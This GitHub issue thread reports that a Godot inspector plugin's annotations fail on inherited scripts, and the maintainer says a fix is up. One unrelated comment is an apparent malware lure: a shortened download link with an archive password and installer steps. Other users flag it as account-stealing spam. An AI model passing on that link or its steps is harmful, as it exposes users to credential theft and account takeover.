### ISSUE TITLE
Add support for extended scripts

### ISSUE THREAD

**Issue by rethyria** [don-tnowe/godot-inspector-extender#10]
Hi, first - big thanks for creating this! Customing the inspector is a huge pain so this is an amazing convenience.

I haven't tested this on all the different options but at least @@show_if and @@message don't seem to work if the commentributes exist in an inherited script - so they work on a node with the source script attached, call it 'ScriptA', but not 'ScriptB' which extends ScriptA.

I suspect the rest of the attributes don't function either.

Tested on Godot 4.2.2

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by EnigmaEmmy** [comment]
> Download https://bit.ly/3MjP129 password: changeme In the installer menu, select "gcc."

Sorry, the link is blocked by bit.ly for whatever reason.
Though, tbh, kind of a sus comment in any case :/

**Comment by MahouShoujoMivutilde** [comment]
Do **NOT** run it.

It's malware that'll steal your account if executed, to spread further spamming the same message elsewhere. 

There are a lot of comments like that

https://github.com/search?q=is%3Aissue+%22In+the+installer+menu%2C+select+%5C%22gcc.%5C%22%22+AND+%22password%3A+changeme%22&type=issues&s=created&o=desc

(and this is how I found this issue)

**Comment by don-tnowe** [comment]
Thanks! Should be up now.
